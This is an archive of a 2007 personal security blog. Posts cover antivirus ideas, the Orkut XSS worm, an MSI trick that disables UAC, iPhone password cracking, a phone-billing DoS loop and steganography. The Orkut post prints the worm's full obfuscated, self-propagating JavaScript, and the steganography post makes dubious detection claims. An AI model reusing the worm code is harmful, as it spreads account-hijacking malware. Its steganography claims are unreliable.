Monday, December 31, 2007

Herd Intelligence Against Internet Malware

Hi folks,
today I wanna point out this paper on InfoWorld on Herd intelligence. As everybody know, poli-worms can easily change from machine to machine, making hard AntiVirus-companies' life. Often Antivirus and Anti-Malware are based on signature "finger-print" and for that reason it's still easy bypass them. In this paper the Author describes how the companies want resolve this problem using Herd Intelligence. Who is the Herd ? Of course here we are !! Yep,.., companies are thinking to use clients computers in order to grab news malware,new virus signature and so for....


The idea is simple, according to the analyst. If attackers are going to attempt to create different attacks for nearly every individual user, then security software vendors must use their customers' machines as their eyes and ears for discovering and addressing those variants. (from site)


Well, this is an interesting (possible) solution to the problem but what I can't yet understand is why companies are fixed on fingerprint technologies. Using fingerprint means running after malware, not prevent them and not absolutely block them. What I'm asking to myself till now is: why Antivirus companies don't use a behavioral detecting technique ? There are many researches on dynamic malware detection based on API sequences and based on data flows that, if well implemented and well planned can really improve the malware prevention, why company don't invest on this "paradigm shifting" rather then building Client Herd Computers guinea-pigs ?
I'm pretty sure that it will be cheaper, because building Herd Clients' computers means writing more client-side agents as well as rewrite the software detection. Moreover building herd means teach people to understand that, means teach computer technician to repair news systems, means try to persuade people that the new agent sends only malware information and not sensible information and so on.......
Another problem comes from trusted computer field.... How can we know that the news agents installed on ours machines are safe ? Again, how can we know that these softwares don't send sensible and/or private information to Antivirus company ? How can we assume that Antivirus company have good intention ?

If we take as example Diebold company and its Voting Machine, it's pretty easy understanding that these assumptions are really too strong in Internet era.

Thursday, December 27, 2007

CurtTV: Tigers Team

Well, another nice saga from courtTV. For those who know some Tigers Teams it will be really FUNNY, for those who don't know any Tigers Team it'll be a very interesting video. In any cases enjoy your vision.



Here the "Tiger Team 101" episodes.
First
Second
Third
Fourth

Saturday, December 22, 2007

XMAS: working with 20% of overflow ... ... ... ... ... ...

I know, it's Xmas. I should stop working and stay with my family or.. something like that. Well I really wanna stopping but I'm still working on 3 different papers, the deadlines are at the end of January and February . It seems reasonable stop blogging just for some days but actually I don't now If I'll withstand to write some news on my blog. Anyway , tomorrow I wanna point out  a very interesting post by Ann in her blog. Here you can find the original post  (MSI Script vs Windows Security), where Ann describes how :

1) Change the value of windows system registry values:
2) Run a low-level system tool:


Running some script (see the original post) during installation phase it's possible get higher permissions. The main problem seems in msiexec, which gets elevated priviledges during installation phase.

If you try to do this explicitly as a regular user (or without elevated privs on Vista), Windows will politely tell you that you can't. But if you execute the following MSI script during an installation (running the installation as a regular user), msiexec gets elevated priviledges, and can do whatever you want. Here's an example silently disabling UAC during an installation by launching regedit from cmd. (This is run in Wise via 'Execute Program from Destination', Working directory: SystemFolder):

Another interesting project that I've seen during the past days is PhisTank.It's a website where dedicated volunteers submit URLs from suspected phishing websites and vote on whether the submissions are valid. The idea behind PhishTank is to bring together the expertise and enthusiasm of people across the Internet to fight phishing attacks. The more people participate, the larger the crowd, the more robust it should be against errors and perhaps even manipulation by attackers.
I'm interested on this project for several reasons but one of the most important reason that carried me through this project has been reading this paper by University of Cambridge. Tyler Moore and Richard Clayton describe why and how this (great) service is vulnerable. I was amazing during the reading because it's impossible understanding how a pretty-important conference like Financial Crypto may public this kind of (easy and not innovative) work. Maybe my though on Financial Crypto is wrong.

Friday, December 21, 2007

I've read it online so it's true.

How many times we hear:
"I don't agree with you, I've read something online that proves the opposite" or "I'm sure I've read online !".
But are you sure that everything you read online is true ?



Well, now we are sure ! :-)
via Christofer

Thursday, December 20, 2007

Orkut was hacked !

It's amazing understanding the main problems are always the same problems.... Anyway another XSS Worm but "today" it fights google company!




Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

From different sources:


On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.



On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.


The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o="\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"



Here the complete decoded script.
And here the original advisory.
And of course try to search something on google about this vulnerability, you'll be redirected right here: the always upgraded google malware list.

Tuesday, December 18, 2007

Yet Funny Stuff

Another Funny Picture, quite off-topic but so cute !

In my mail box too.



The card.zip attachment contains card.scr (md5: 536BFC077FBAD247FA5EA67ADF1DCA7D), which we detect as
Trojan-Downloader.Win32.Agent.gbu.

Monday, December 17, 2007

Software upgrading.. .. .. ..

It's time to get up and see what new softwares have been made. It's long time that I don't focalize my attention on new software generation. During these days I decided to analyze two different software signed up from MacApp community.
Yet others useful and cheap MAC softwares to organize your computer.
The first one has been named Hazel 2 by designers, it's a MAC cleaner while the second one is a TimeMachine configure tool, named TimeMachineSchedule useful to manage advance time machine capabilities.




From web site (click on the above picture):

Hazel watches whatever folders you tell it to, automatically organizing your files according to the rules you create. It features a rule interface similar to that of Apple Mail so you should feel right at home. Have Hazel move files around based on name, date, type, what site/email address it came from (Safari and Mail only) and much more. Automatically put your music in your Music folder, movies in Movies. Keep your downloads off the desktop and put them where they are supposed to be. Hazel can open, archive, set color labels and add Spotlight comments. And in Hazel 2, you can now have Hazel rename your files or sort them into subfolders based on name, date or whatever combination of attributes you choose. Hazel 2 gives you the ability to create even more powerful workflows than ever before. When you throw away applications, they can leave behind support files that never get cleaned up. With Hazel 2's App Sweep, Hazel will detect when you throw applications away, search for its support files and offer to throw those away as well. Uninstalling applications is integrated with your Trash so you don't even have to think about it. Hazel features new actions to import your files into iPhoto or iTunes. Keep your media in line. Add to your library or to a specific playlist or photo album. Improved Spotlight integration allows you to use any Spotlight attribute in your rules. Filter files based on Spotlight attributes or use them in conjunction with the new renaming and sorting actions. Sort your photos by aperture or shutter speed or rename your music files with artist, album and year. Make your metadata work for you. Hazel has options to clean out those pesky unneeded files that clutter your folders, getting rid of incomplete and duplicate downloads for you. And, of course, you can set up whatever rules you want to automatically throw files away.You can have Hazel manage your Trash. Select from different options to keep your Trash in check. And for extra security, Hazel can also shred files like Finder's "Secure Empty Trash" option.Hazel's rules can trigger Automator workflows, AppleScripts and shell scripts. Hazel will run whatever you throw at it, making it easy for you to integrate into your workflow.








From the web site (click on the above picture):

In Mac OS X 10.5 Leopard Apple has introduced Time Machine, a very convenient way to make backups.Unfortunately the backup interval is preset constantly to one hour. Apple uses an launchd daemon to control the timing,
but changing the interval value in the launchd.plist file has no effect.
TimeMachineScheduler disables the automatic backup function of Time Machine and installs its own launchd agent.As the agent is located in the main library, the administrator password is required for all (writing) operations.Except disabling Time Machine no further system files and preferences will be touched by TimeMachineScheduler.
There are (still) some access privileges problems in OS X 10.5 Leopard, if the operation system has been updated, migrated or installed with the archive & install option. TimeMachineScheduler takes care of all files and sets owner, group and the privileges to the proper default value.You can install and uninstall the agent as well as only load and unload it to disable making backups temporarily.The interval can be set between 1 and 12 hours, and the agent can be set to run additionally at load, which means also at startup and login.
You can press a button to run a backup immediately. The status of the scheduler will be displayed.During a runnig backup the control elements are disabled. All actions will be written into a log file (~/Library/Logs/TimeMachineScheduler.log).TimeMachineScheduler is not required to run permanently, the scheduler works self dependent in the background. If you want to revert to the original settings of Time Machine, just uninstall the scheduler and enable Time Machine in its Preference Pane.
For the worst case (which will never happen) an "emergency" uninstaller is included.

I've just tried from fews days this softwares but I can say that (in particular the second one) are really useful to manage your big mole of folders, files and whichever. I'm pretty sad for Hazel that 's still under commercial license but it works really fine.

Saturday, December 15, 2007

News on iPhone

Hi folks,
it's a lot of time that I don't speak about iPhone cracking status. Actually I gotta a 1.1.1 firmware and I'm very happy to no change it because it's still working good. Anyway, what's happening in iPhone hacking community ? Are they researching a solution yet ? Yes and no... something is happened.




First of all two theoretical exploits have been found on the new bootloader 4.6 !!
And you know what it means! 1.1.2 OTB Software unlock coming very soon! Another important new come from iPhone Dev Team who opened its software. However there is no solution yet to break the SIM control putting any sim card. Actually the community has just discovered the NCK (Unlock Code) but it's pretty hard to break with normal BruteForces techniques.

The NCK code is transfered during activation of your iPhone.
A plist file is created on the iPhone, and then sent to Apple webserver.
If the iPhone is unlocked in Apple's database, it will reply with the unlock code.
They have managed to send an activation request to apple webserver and catch the NCK. 


It looks like this: "UnlockCode" = "NO=111111111111111&";

The '1' are to be replaced with digits, so I guess that the unlock code is 15 digits long.
Way too long for a bruteforce attack...They doubt the unlock code has any correlation with any device ids, it is more likely that Apple has it stored in a database for every single iPhone.
If you cannot wait for the software solution, that seams coming very soon, there is an easy-to-use and intuitive hardware solution by TurboSym for $59 that forks fine !

The reverse continues.

Thursday, December 13, 2007

Elevator And Peter G. Neumann

Obviously you can think on the link between the absolute guru Peter G. Neumann and the elevator of my Miami Beach Hotel. Well, it make sense absolutely, let me say.......

Was a sunny and really hot day in Miami Beach (Florida) during the 23th ACSAC conference. It was the first conference's day, I was exited to stay in the 17th floor of  a very very hight Hotel in front of the ocean. I took the elevator coming in the "East Ocean" room in order to assist at the first talk. Inside at the big elevator an old man looked me with a strange smile and he asked me:



Hi, How's going


He looked to my neck-id and said again:


Marco, nice to meet you. I'm Peter Neumann


I was astonished, paralyzed, I cannot imagine that he was the "true" Neumann and so I said:


Hello Peter, my name is Marco from University of Bologna


He smiled, as a person who known that I didn't recognized a famous personality like him....
Only after few seconds I recognized that he was truly he. Perplexed, I followed him and I said:


Sorry I didn't recognize you


I tried to improvise few minutes of speaking and at-the-end I asked a little autograph on my proceedings. Now I got it.
I'm really proud to show this on my blog.


Tuesday, December 11, 2007

During Some Free Time

Some time I cannot understand why people don't want reading normal and easy paper but they prefer asking (in this case -to me-) a lot of obvious things. During these days I received some mails asking how to change system administrator properties. In particular case some of my "old" student wanna know how to fix time on users accounts using linux OS. Well, just 2m of google research and I found lots of great paper on this problem. Anyway the most easiest way to fix the time ,on user accounts, is using pam_time.so by Andrew G. Morgan. Keep in mind that the main useful file is in /etc/security/time.conf .

Here an easy example :

Service;ttys;users;time

To limit ssh access from 23:00PM to 08:00AM -favorite hacker's time- you can write the following lane

sshd;*;*;!Al2300-0800

The !Al term means, anything axcept "All the days".

Another great example could be the following one:

login;*;!root;!Al1600-2000

It permits people from 4PM to 8PM all the days except the root.

If I can suggest something to you; remember that the initial hardening time is one of the most important procedure to increase security on your machines. be careful.

Friday, December 7, 2007

Annual Computer Security Applications Conference.

Hi folks,
I'm going to ACSAC next week.



I'll be in Miami Beach and Orlando in order to see the shuttle launch ! Maybe I'll not able to upgrade my blog corner but if I'll find some free time I'll discuss on what I will see. I've have never seen ACSAC I'm pretty curious assisting this event. Thank you very much to Marco Prandini to involve me in this activity !!

Wednesday, December 5, 2007

California Electronic Voting.

My super boss said:


Electronic voting systems used throughout California still aren't good enough to be trusted with the state's elections, Secretary of State Debra Bowen said Saturday.
While Bowen has been putting tough restrictions and new security requirements on the use of the touch screen machines, she admitted having doubts as to whether the electronic voting systems will ever meet the standards she believes are needed in California.


And I've thought ... ... ... ... I know, I know ;-D. Anyway it's an interesting article on the importance of Voting Machine in USA.

Tuesday, December 4, 2007

Mac Book Pro: the fastest Vista Notebook

PC World, says that Mac Book Pro it's the faster Notebooks running Microsoft Vista !
It's a pretty amazing news I know,.., but if you believe that Apple has not faltered to publish this new video, it becomes really amazing !




I like the apple commercial videos, one of my favorite was the "Security" but this one is one the funniest that I've ever seen !
Thanks apple for these laughs !

Monday, December 3, 2007

SANS Top 20

Every year SANSpublics the top twenty vulnerability of the year classified in different categories.This year:

Client-side Vulnerabilities in:
C1. Web Browsers
C2. Office Software
C3. Email Clients
C4. Media Players

Server-side Vulnerabilities in:
S1. Web Applications
S2. Windows Services
S3. Unix and Mac OS Services
S4. Backup Software
S5. Anti-virus Software
S6. Management Servers
S7. Database Software

Security Policy and Personnel:
H1. Excessive User Rights and Unauthorized Devices
H2. Phishing/Spear Phishing
H3. Unencrypted Laptops and Removable Media

Application Abuse:
A1. Instant Messaging
A2. Peer-to-Peer Programs

Network Devices:
N1. VoIP Servers and Phones
Zero Day Attacks:
Z1. Zero Day Attacks


In my opinion nothing happened; It's from many years that security land scape doesn't change. Client side vulnerabilities are more often browser vulnerability because browser like FireFox and IE are the most used client. On the other hand Web Application are growing up and not every developer is careful on security issues, so it's reasonable that it's still in the first Server Side Vulnerabilities. But..., actually I don't agree with the position of H1 and H2. My personal experience focused on security says that Phishing it's one of most important security problem of the current era. Preventing phishing means prevent security technical aspects and Social Security aspects; for the first lots of groups are working on with great results but for Social Security aspects the evangelist community is back yet. For this reason Phishing is one of the most important and used attacks. H1, is 'f course a really important problem but more fought during past security history; I believe that bounds of steps have been already done on this particular way, and for this reason not comparable with more recent phishing.

Friday, November 30, 2007

Say Goodbye to robots.txt

Yesterday Automated Content Access Control bore.

It’s hard for anyone to make content available for access and use on the network without any rules…
It’s hard to follow rules if you don’t know what they are…
It’s hard to learn how to read and understand rules if you are a machine…


Search Engines fulfill to Web-Sites owners. Is this a new Wide Web Era ? I think so, I think it should be very interesting stuff to web security. Hiding whatever you want, it's not an easy job if you're online. Often Google, Yahoo and others grab you secret contents allowing attackers to read-and-play with them. Robots.txt is still now a not-standard but just a unofficial-convention with some web spiders; building a new standard deal is a "must" even to prevent search-engines-attacks. I totally agree with ACAP project !.
Anyway what will happen to you web-site ? Just few but important changes:

1) changes to your 'robots.txt' file
2) changes to content resources

If you already have a robots.tx here an easy to use converter plugIn able to translate your old robots.txt into acap standard. However if you want to use the whole ACAP powerful you should read the Technical Giude , ... not so much long. Of course, don't forget to public on your page the logo :-D

Thursday, November 29, 2007

Really Funny.

When the art captures the truth :-D



:-)

Easy Password Checker.

Hi Folks,
today I wanna point out an example of Password Checker that I've founded here, via Schneier. It's a pretty easy example how to use "score based intelligent" without any recursive-based language. Starting from 0 points your password can only increase its score passing tests until the greater tally 6.
Here an example: try with your password ! (It's Javascript)



The main javascript "score" function is available here:



Nice, don't you think ?

Tuesday, November 27, 2007

Jumping CAPTCHA.

Here one of the most coolest "on fly" tools that I've ever seen.
Try to load the page many times and try to count the false positive, they are really few !
This easy php page exploits CAPTCHA number thanks to an easy statistical analysis on frequency color per digits. Actually It's quite poor but it runs well and it does the Trick !!!



The main idea is the following:


Here you can find the entire source code.
Via this site.

The Day The Routers Died...



Via Joerg Moellenkamp

Monday, November 26, 2007

IPod Touch Audio Line-In Discovered

Hi Folks,
another big news from ipodtouchfans, a new Audio Line Input has been discovered, this allow many applications run and maybe also VoIP applications. From touchmods.blog.com the first amplificator schema :
 

A little description:
- 13, 26 and 29 are the pin indices of the Dock Connector.
- The Resistor above the mic could be between 1 and 5kOhm, depending on your mic
- The capacitors C1 and C2 should be above 1microPharad, any vale is ok.

The picture quality is not the best, as it was made in a fast way on my N770 using the amazing Xournal noteTaker.
Anyway, what is important, in case you plan to build everything inside the Dock Connector, you will need to make a PCB that is all-in-all less than 3.5x 8x 16mm, as the internal height of the Dock Connector is 3.5mm. Not to mention that the position of the PCB will be also restricted (centralized) by the pins inside the plug. A smart solution would be to leave the PCB out and to put the resistors directly onto the legs of the IC. Doc connector available here


Read more here , here , here, here and here.

XSS CSS INJECTION on IE7 and Firefox

Hi folks,
today I wanna present a great work on XSS CSS injection. Following the amazing work of Martin, style="xx:expression((window.r!=1)? ...... , Gareth wrote a more complete example  of injection scenario. Here it is !



That Translated from hexadecimal  becames:



It's still incredible seeing execution of code even if converted into whole entities as htmlspecialchars. Yep, incredible but true ! Some one is just saying you should never allow users to insert HTML code in your pages but I don't think so, it's difficult to give something and than take it back, it's difficult saying STOP HTML to users now, where users are living on HTML. Maybe security staff must learn from this "another example" and works hard to prevent others similar stuff.

Sunday, November 25, 2007

Thank You Guys

Hi folks,
I'm proud to announce to be one of BlogSecurity Team.
Grabbed from the BlogSecurity Site.


BlogSecurity is the only organization that deals with social networking and web blog security exclusively.
Our goal is to provide you with the security advice, services, tools and critical information that you need to better secure and build your blog.

Tuesday, November 20, 2007

Big Scare from Apple !

During these days lots of blogs ( tuaw, heise-security, docpool and so on ..) published this agonizing news about apple. Something wrong happened in Stocs  and Weather applications during the Network Update phase. A strange IMEI code is passed on apple.com as you can see in the following picture.




What's happening ? Is Apple spying us ? Are there tons of data written with IMEI ? Can they recognize me ? Can they understand where I am ? ecc ecc....
Fortunately, it's not true. The IMEI parameter passed to apple.com is an software-ID and it's the same for all the phones. Or it seems that. Unfortunately I got only one iPhone and I cant make more-deep testes. Right now I used Wether and Stocks without any worries but I'll more careful until some of new come up.

Interesting reading here.

Sunday, November 18, 2007

AT&T Allows Denial of Service

I've been using AT&T for 4 months. What I saw is that you must pay if you're phoning but also if you receive calls. You must pay also if you 'try' to phone, and you must pay if you decide to not answer. Well, you must pay every time !
Is it right ? Maybe Yes, if your mind thinks to "communications" or it seems wrong if your mind thinks to "services". So, what I know is that AT&T is a "communication oriented" provider instead others European networks providers are "service oriented".  But what about security ?  If I'm using a "service oriented" network provider, like EU architecture, I'll pay only if some one answers to me. So the following scenario could be assumed as safe:

A call V
network does...... TU...TU...TU...TU
V doesn't answer.
network does....... TU.TU.TU.TU 
A has spent nothing
V has spent nothing

If I'm using a "communication oriented" network provider, I take up the network so I'll spend even though no one answer to me. At the same time also who doesn't answer to me takes up the network and so he will spend money like me. In this way if an attacker wants to make a denial of service on the victim's phone, he could follow this procedure.

for(;;){
Attacker (A) calls Victim(V) (with hidden cell-id)
network does........ TU. (A stops the call)

A has spent $0.x
V has spent $0.x
}

If we assume that Attacker has more money than Victim, at the end of the day Victim is not able to phone. Both A and V will spend the same amount of money. So if Attacker really wants to make a DoS attack on one or more phones he can.
Maybe "services oriented provider" are more secure under this point of view. 

Saturday, November 17, 2007

Say Hello to SpiderPig

Hi folks,
I know, it isn't security but it's so funny !!
Today surfing on the web I've seen SpiderPig ..... (or SpiderPork, italian version is more funny), in this site and I decided to publish just for fun ! To me it's really amazing ! :-D.









Print, cut and attach it Wherever you want ! Here some little examples:








Enjoy Your SpiderPork !!! :-D

Friday, November 16, 2007

A Restricted Test Apple Test.

A really Restricted Test on "addicted to apple" gave me 85%, ... , not bad ....

85%
It's really Funny :-D !

Wednesday, November 14, 2007

Studying covert channels

Covert channels have been a big problem for years. Recently applied in Electronic Voting System can threaten Democracy. I've found a nice software in order to understand how covert channels can work. I've downloaded it here and I've just tried how it works. As usually just few screens shots.
The first MAC is 10.0.0.12 and the second one is 10.0.0.13




The connection




Opening an easy nc connection in both MAC.




Writing something in the first nc shell (10.0.0.12) the message will be forwarded into the second nc shell using covert channels. But following the Tao suggestion what's happening in our communication ? The communication starts in that way. An easy Http GET with cookies stetted "this is a string \r\n", the exact data that I've pushed on first nc shell (10.0.0.12) 





The right answer from 10.00.13



The Answer from second nc shell (10.0.0.13) is forwarded to second nc shell (10.0.0.12) using another cover channel



Whit the relative data !




It's a very easy example of two different covert channels, the first one using a cookies in tx and the other sending tcp data back. I think this example should be really useful for teaching purpose.  Maybe could be interesting improve-it using different channels and protocols and upgrading the communication level with a strong data encryption in order to hide written data. Should also be interesting building a kernel based implementation upgrading modern distributions.

Verizon has confusing ideas

Thank to Justin :



It seems ridiculous and quite impossible but nope, it's true. Also in America it's happens :-D

Monday, November 12, 2007

The first MacBook Pro with a 64GB SSD?

Here the original experience.




One of the most cool experiment I ever seen !! MacBook Pro with Solid Hard Disk installed without any complications, as you can read from original post. I guess apple will not wait much more !

Friday, November 9, 2007

iPHone Password Cracking.

Hi folks, yesterday I bought my first iPhone.
It's great, with a lot of functionality and  security is really high :-D :-D :-D. But while I was looking inside the File System, just for studying embedded architecture ..., I realized that a mysterious file named master.password was inside the /private/etc/ folder.




Well, intrigued I opened it and .... Yep, an old passwd style file appeared in front of me.





Wow, it's really secure !! Yep, there's written about single-user but..... iPhone is embedded System it's running in single-user !!! :-D. So could be interesting understand how much is the password secure.... Maybe apple puts a really strong passwords !
Let me try with John on my poor old PowerBook G4.




Ohhh, The password is really really strong and so hard to guess, how  have hackers discovered it ?!? (I'm kidding)
Well, I'd like emphasize two posts in order to answer at this rhetoric question, the first one  one of my old post and the second one , a great post on password security by Ann. Security Evangelist are really useful in current security-era .


Voting machines casted wrong candidate.

Well,...
there are a lot of people who are working to increase the electronic voting security. But on the other hand there are lots of people who don't care about it ! It's 'pretty' incredible !

Via Wired 
Votes cast yesterday on e-voting machines made by Election Systems &
Software went to the wrong candidates, according to officials in
Lawrence County, Ohio.

Wednesday, November 7, 2007

Leopard Data Loss BUG













This news is two days old, but I've not founded time before to say thanks Tom. Grabbed from here:"Leopard’s Finder has a glaring bug in its directory-moving code, leading to horrendous data loss if a destination volume disappears while a move operation is in action. I first came across it when Samba crashed while I was moving a directory from my desktop over to a Samba mount on my FreeBSD server." Here we go, it's time to Leopard's bugs ! Really Good personal working stuff. Here there is also an avi for people don't like read.


video

Monday, November 5, 2007

How to detect Steganography.


Hi folks,
During last week I've found some interesting stuff on Steganography, well I wanna discuss about detection and not about Steganography, so please if yu're interested on this post read the wiki pedia definition linked above.


Well, right now I've seen lot of people who don't know anything about Steganography and how to detect it, I know there are lots of free software like StegoDetect that can easily detect if the current file has been compromised, but as usually I like touch by hand what happen inside the file. So during these days I've analyzed some file extension with and without Steganography.
Let me start with classics examples like .gif images.

This is a normal gif image without any items hidden.


And this one is the same picture with some plain text steganographed inside. 




Human eyes can't see the difference between the two pictures, but the hexadecimal editor can !!! So if we try to open normal .gif images and the compromised one we can compare the differences and understand how it's possible detect Steganography inside GIF image.

And, yep we got it ! As you can see from the following pictures the first bytes are different !
This is first picture's hexadecimal view, and you can read "47 49 46 38" that's means "GIF" in ASCII way.


This is the second Pictures' s hexadecimal view, you can't see "GIF" bytes ...



Well, it's so easy to detect !!! Let me try with others pictures formats for instance with .jpg files. Apparently there are not similarity between a normal jpg pics and a compromised one, but if you study JPG header and body format you can discover that every JPG image ends with "FF D9" Bytes. So you if it's true we must find "FF D9" in the normal JPG and others stuff in the compromised image. De facto it's true. Safe JPG following:



Compromised JPG following:


Yet, examples.
PNG is another important image format, the PNG header is well known so should be easy detecting injections. It's still true, the difference in the header is impressive. Normal PNG format.



And Fake PNG header.



So here we are.. It's not so difficult understanding if an image has been compromised ! Some times some Steganographic software are more smart than others ones but it's difficult lying to hex editor. Anyway it's really different for MP3, exe and other stuff like that.

Friday, November 2, 2007

Porn to break Captchas

Via BBC (whole paper).

Spammers have created a Windows game which shows a woman in a state of undress when people correctly type in text shown in an accompanying image.
The scrambled text images come from sites which use them to stop computers automatically signing up for accounts that can be put to illegal use.
By getting people to type in the text the spammers can take over the accounts and use them to send junk mail.
This example shows; why are so important the security evangelists professionals people ! This technique has been introduced some years ago as you can read from the following links:
It's not a mystery, at least for security evangelists ... ... ... ... ... ... ...

Wednesday, October 31, 2007

Yet, Another Interesting Linux Distribution



It should appear as a non easy distribution to use but it's false. ZeroShell is one of the easy and important server-oriented distribution that I've ever seen. Lots of services like RADIUS, KERBEROS and Captive Portal are quite difficult to setting-up and to use. Thanks to 0shell the configuration and the setting-up of these services is really easy and fast. Yep, fast. Right now one of the majors problems that fight against Linux is the not faster setting-up of services. With others systems it's pretty easy install and configure the whole service; instead on Linux platforms, in particular if you are an old style geek it's result so difficult and it takes a lot of time. Well, it's not true thanks 0shell. Actually you can download and install it; keep it and get out your old systems :-D. 
Grabbed from the site: http://www.zeroshell.net/eng/


Zeroshell is a small Linux distribution for servers and embedded devices aimed at providing the main network services a LAN requires. It is available in the form of Live CD or Compact Flash image and you can configure and administer it using your web browser. The main features are listed below:

RADIUS server for providing secure authentication and automatic management of the encryption keys to the Wireless 802.11b, 802.11g and 802.11a networks supporting the 802.1x protocol in the EAP-TLS, EAP-TTLS and PEAP form or the less secure authentication of the client MAC Address; WPA with TKIP and WPA2 with CCMP (802.11i complaint) are supported too; the RADIUS server may also, depending on the username, group or MAC Address of the supplicant, allow the access on a preset 802.1Q VLAN;

Captive Portal to support the web login on wireless and wired networks. Zeroshell acts as gateway for the networks on which the Captive Portal is active and on which the IP addresses (usually belonging to private subnets) are dynamically assigned by the DHCP. A client that accesses this private network must authenticate itself through a web browser using Kerberos 5 username and password before the Zeroshell's firewall allows it to access the public LAN. The Captive Portal gateways are often used to provide authenticated Internet access in the HotSpots in alternative to the 802.1X authentication protocol too complicated to configure for the users. Zeroshell implements the functionality of Captive Portal in native way, without using other specific software as NoCat or Chillispot;

QoS (Quality of Service) management and traffic shaping to control traffic over a congested network. You will be able to guarantee the minimum bandwidth, limit the max bandwidth and assign a priority to a traffic class (useful in latency-sensitive network applications like VoIP). The previous tuning can be applied on Ethernet Interfaces, VPNs, bridges and VPN bondings. It is possible to classify the traffic by using the Layer 7 filters that allow the Deep Packet Inspection (DPI) which can be useful to shape VoIP and P2P applications;

Host-to-lan VPN with L2TP/IPsec in which L2TP (Layer 2 Tunneling Protocol) authenticated with Kerberos v5 username and password is encapsulated within IPsec authenticated with IKE that uses X.509 certificates;

Lan-to-lan VPN with encapsulation of Ethernet datagrams in SSL/TLS tunnel, with support for 802.1Q VLAN and configurable in bonding for load balancing (band increase) or fault tolerance (reliability increase);

Router with static and dynamic routes (RIPv2 with MD5 or plain text authentication and Split Horizon and Poisoned Reverse algorithms);

802.1d bridge with Spanning Tree protocol to avoid loops even in the presence of redundant paths;

802.1Q Virtual LAN (tagged VLAN);

Firewall Packet Filter and Stateful Packet Inspection (SPI) with filters applicable in both routing and bridging on all type of interfaces including VPN and VLAN;

It is possible to reject or shape P2P File Sharing traffic by using IPP2P iptables module in the Firewall and QoS Classifier;

